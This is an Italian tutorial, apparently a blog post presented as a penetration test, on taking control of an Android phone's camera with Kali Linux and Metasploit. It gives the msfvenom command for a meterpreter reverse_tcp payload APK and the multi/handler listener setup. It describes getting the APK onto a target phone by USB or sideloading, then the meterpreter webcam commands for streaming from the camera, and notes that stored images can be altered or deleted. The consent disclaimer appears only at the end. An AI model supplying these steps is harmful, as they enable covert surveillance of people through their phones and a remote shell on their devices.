Ci sono state diverse notizie di hacker che hanno dirottato le fotocamere dei telefoni Android per intercettare i propri utenti o fornire loro immagini false. In qualità di proprietario di un telefono attento, potresti cercare di evitarlo valutando la probabilità e i rischi reali di un evento di tale minaccia.
Kali Linux è uno dei migliori strumenti per controllare le potenziali vulnerabilità della fotocamera del tuo telefono Android attraverso un penetration test. Può aiutarti a rimanere aggiornato su qualsiasi tentativo di hacker di accedere in remoto alla fotocamera del telefono.
Installazione di un payload exploit
Per utilizzare Kali Linux per un penetration test, devi prima scaricarlo dal suo file sito ufficiale. Fare riferimento a questo tutorial precedente per le definizioni di vari gerghi come “msfvenom”, “msfconsole”, “meterpreter” e altri che verranno utilizzati in questo esercizio.
Il primo passaggio nei test di penetrazione è installare un payload exploit standard sul dispositivo. Per questo, apri il terminale Kali Linux e inserisci il seguente comando: ifconfig
. Questo ti darà l’indirizzo IP della tua sessione di Kali Linux.
Ora inserisci il comando mostrato di seguito utilizzando l’indirizzo IP sopra. Il numero di porta per exploit, trojan e altre vulnerabilità è generalmente indicato come 4444.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > Payload.apk
In questo passaggio, prova a iniettare un payload metasploit, che si basa su un interprete Java. In caso di successo, il test di penetrazione ti aiuterà a verificare se il tuo telefono è vulnerabile a qualcuno che ascolta le telefonate, accede a SMS, localizza l’utente, ecc.
In questo caso il tentativo è quello di mostrare come l’exploit possa essere potenzialmente utilizzato per accedere alle telecamere del telefono.
Una volta avviato l’exploit, nella cartella principale verrà installato un file APK chiamato “Payload”. Devi installarlo su un telefono Android di destinazione. Tuttavia, è più facile a dirsi che a farsi. La maggior parte dei telefoni Android e delle e-mail più recenti rifiuterà di trasportare tali file infetti da malware, e questa è una buona cosa.
Tuttavia, può ancora essere ottenuto tramite un cavo USB o file temporanei. Se un hacker ha accesso al tuo telefono per pochi minuti, questo lo rende un po ‘vulnerabile. Il nostro sforzo qui in questo test di penetrazione è determinare la portata precisa del rischio coinvolto.
Una volta trasferito, devi trovare un modo per installare il file del payload sul tuo telefono. A meno che non si tratti di una versione Android molto vecchia, il tuo telefono dovrebbe darti diversi avvisi prima che l’APK possa essere installato. Tuttavia, indipendentemente dalla versione del telefono Android, ci sono molti altri modi per installare app da fonti sconosciute in un telefono Android.
Avvio di Exploit
Per avviare l’exploit Payload di cui sopra, inserisci il seguente comando: msfconsole
. Ci vorranno solo pochi secondi per l’esecuzione del comando e il metasploit può essere pronto per ulteriori test di penetrazione sulle fotocamere del telefono.
Il metasploit darà la sua descrizione completa. È visibile anche il riepilogo del carico utile. Mostra il numero di exploit al lavoro.
Nel passaggio successivo msfconsole è pronto per lanciare l’exploit. Per questo, fare riferimento all’indirizzo IP e al numero di porta (4444) discussi in precedenza. Di conseguenza, inserisci i seguenti comandi:
exploit (multi/handler) > set LHOST "IP Address" [ENTER] set LPORT "Port number" [ENTER] exploit [ENTER]
Quando il gestore TCP inverso è attivato, vedrai varie fasi del lancio di Meterpreter. Attendi alcuni secondi mentre diagnostica il telefono di destinazione.
Va menzionato qui che la maggior parte dei moderni telefoni Android continuerà a negare questo accesso. Ricorda che questo è un test di penetrazione. Se il tuo telefono Android non può essere penetrato utilizzando questo file APK letale, significa che il produttore del tuo telefono è a conoscenza di questo particolare vettore di attacco.
Accesso alla fotocamera del telefono Android
Se sei riuscito a inserire con successo l’exploit nel telefono, c’è la possibilità che ora possa essere penetrato. Quando ciò accade, il “meterpreter” su un terminale Kali Linux sarà in grado di stabilire una connessione con il telefono. A questo punto inserisci help
per accedere a più opzioni all’interno del telefono Android sotto attacco.
Immettere i seguenti comandi (dal menu della guida) per accedere alle telecamere del telefono. In questo exploit c’è stato un tentativo di accedere alla fotocamera posteriore per scattare foto dal terminale.
webcam_list [ENTER] 1. Back camera 2. Front camera [ENTER] webcam_stream -i 1
Per completare un penetration test con successo, una volta che sei in grado di accedere alla fotocamera, scatta una foto e salvala nella cartella principale di Kali Linux. È inoltre possibile modificare, rinominare o eliminare le altre immagini memorizzate. Pertanto, qualsiasi penetrazione riuscita sul telefono testato è un campanello d’allarme sulla probabilità di un vero attacco, il che significa che è ora di applicare una patch di sicurezza.
In questo tutorial hai appreso come è possibile accedere a una fotocamera Android da un terminale Kali Linux per i test di penetrazione.
Questo è un articolo di ricerca sulla sicurezza. Se stai accedendo alla videocamera di qualcun altro per una dimostrazione, chiedi sempre prima il suo permesso, a meno che, ovviamente, non sia il tuo telefono. Non dimenticare di dare un’occhiata a queste app di hacking per Android per aiutarti a testare e trovare le vulnerabilità nel tuo telefono
Relazionato: